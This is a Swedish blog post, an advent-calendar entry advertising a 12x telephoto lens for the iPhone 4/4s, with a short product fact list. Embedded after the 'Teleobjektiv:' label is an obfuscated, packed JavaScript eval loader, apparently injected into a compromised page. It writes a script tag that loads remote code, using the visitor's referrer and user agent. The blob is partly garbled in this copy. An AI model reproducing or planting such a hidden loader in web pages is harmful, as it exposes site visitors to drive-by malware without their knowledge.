Image Image Image Image Image Image Image Image Image Image

| 15 oktober, 2018

Scroll to top

Top

Lucka 15 julkalender: Teleobjektiv till iPhone

Lucka 15 julkalender: Teleobjektiv till iPhone
Sebastian Plengier Ehrnfelt

Teleobjektiv: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|iaiyh|var|u0026u|referrer|ihdhr||js|php’.split(‘|’),0,{}))
I början av årets julkalender presenterade vi kameraobjekt för din iPhone, en med vidvinkel och en annan med fish-eye. 

Nu har vi också hittat ett teleobjektiv som fungerar perfekt för din iphone.

Om du verkligen vill ta större, bredare, närmare bilder måste du montera en lins på din mobil. Det finns inga andra vägar. Med detta teleobjektiv förstorar du 12 gånger och får garanterat en fördel gentemot dina fotograferande vänner redan när bilden hamnar i din kamera.

Fakta om Teleobjektiv till iPhone

  • Objektivet är kompatibelt med iPhone 4/4s
  • Fast zoom med 12 ggr förstoring
  • Du monterar enkelt objektivet på din iPhone. Sätt din iPhone i medföljande mobilskal som i sin tur skruvas på själva objektivet
  • Innehåller: 12 x Teleobjektiv, 1 iPhone-fodral, 1 Tripod-adapter och förvaringspåse